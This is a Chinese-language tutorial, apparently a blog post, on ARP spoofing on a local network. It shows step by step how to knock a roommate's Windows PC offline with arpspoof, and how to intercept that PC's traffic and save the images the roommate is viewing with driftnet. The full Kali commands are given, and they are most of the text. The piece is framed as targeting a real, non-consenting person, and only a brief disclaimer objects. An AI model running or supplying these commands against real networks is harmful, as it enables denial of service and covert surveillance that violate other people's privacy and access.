内网安全 中间人攻击(ARP欺骗断了舍友网 或 保存舍友正在过浏览的图片)

ARP欺骗(又称ARP毒化) 是针对以太网地址解析协议(ARP) 的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。这种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,也可让网络上特定计算机或所有计算机无法正常连线网络.

   

免责声明:

严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

      

kali2021    链接:https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg 
                  提取码:tian

     

舍友电脑:Win 10(IP地址:192.168.0.102)

        

1.利用 ARP欺骗 断了舍友网.

第一步:确定目标主机在同一个网段.

使用 nmap 命令来实现主机发现:

nmap -sn 地址/24

    

第二步:看看可不可以和舍友的电脑互通.

ping (舍友的电脑IP)

      

第三步:查看 ip_forward 文件值是否为 “ 0

cat /proc/sys/net/ipv4/ip_forward

如果为 “ 1 ” 的话 输入命令:

echo 0 > /proc/sys/net/ipv4/ip_forward 

      

 第四步:利用ARP欺骗来断网.

命令概括:arpspoof -i  攻击机网卡 -t 目标IP 网关IP

arpspoof -i eth0 -t 192.168.1.102 192.168.1.1

 舍友的电脑(已经断网了):

        

2.利用 ARP欺骗 保存舍友正在浏览的图片.

第一步:kali 开启 ip转发.(这样才不会断网

echo 1 >/proc/sys/net/ipv4/ip_forward

      

第二步:对路由器进行ARP欺骗,把舍友的数据转发在我电脑上来.

命令概括:arpspoof -i  攻击机网卡 -t 目标IP 网关IP

arpspoof -i eth0 -t 192.168.1.102 192.168.1.1

       

第三步:打开另一个终端,保存舍友正在浏览的图片.

命令概括:driftnet -i 攻击机网卡 -a -d 保存图片的路径记得先创建文件夹,用来保存图片).

driftnet -i eth0 -a -d /root/bgxg 

查看 /root/bgxg 文件夹.(保存了舍友正在过浏览的图片.) 

     

     

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>